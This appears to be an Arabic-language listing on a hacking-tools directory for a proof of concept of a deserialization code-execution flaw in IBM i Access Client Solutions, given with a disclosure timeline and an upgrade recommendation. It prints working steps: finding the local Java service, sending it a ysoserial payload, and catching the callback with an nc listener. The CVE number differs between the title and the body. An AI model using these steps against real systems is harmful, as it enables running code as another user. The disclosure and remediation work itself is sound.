Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45185 — IBM i Access Client Solutions < 1.1.9.4 - تنفيذ تعليمات برمجية عن بُعد عبر إلغاء التسلسل غير الآمن | Kitploit
أدوات/GitHubGitHub/afine-com/cve-2023-45185
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubafine-com/cve-2023-45185

CVE-2023-45185

IBM i Access Client Solutions < 1.1.9.4 - تنفيذ تعليمات برمجية عن بُعد عبر إلغاء التسلسل غير الآمن

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45184

IBM i Access Client Solutions < 1.1.9.4 - تنفيذ كود عن بُعد عبر إلغاء تسلسل غير آمن.

الجدول الزمني

  • الإبلاغ عن الثغرة للبائع: 22.09.2023
  • إصدار الإصلاح الجديد 1.1.9.4: 08.12.2023
  • الإفصاح العام: 15.12.2023

الوصف

يستخدم IBM i Access Client Solutions إلغاء تسلسل غير آمن لتخزين كلمات المرور وللحصول على مفتاح فك تشفير كلمات المرور. يمكن استخدام هذا من قبل مهاجم محلي أو عن بُعد لتنفيذ كود.

يمكن العثور بسهولة على الخادم المحلي باستخدام الأمر `netstat' command:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)

يمكننا تأكيد تفاصيل هذا الخادم المحلي باستخدام الأمر ps:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java

يمكننا تحقيق تنفيذ الكود بواسطة المستخدم mmajchrowicz باستخدام حمولة ysoserial من حساب mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nat -6 ::1 34307 

في الطرفية الثانية سنستقبل الاتصال بعد تنفيذ الحمولة من قبل الخدمة:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$

كان سبب هذه المشكلة هو إلغاء تسلسل غير آمن لحزم الشبكة وبيانات المستخدم. تم إصلاح هذه المشكلة في IBM i Access Client Solutions 1.1.9.4.

الإصدارات المتأثرة

< 1.1.9.4

التوصية

قم بتحديث IBM i Access Client Solutions إلى الإصدار 1.1.9.4 أو أحدث.

المراجع

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45185
تنزيل الأداة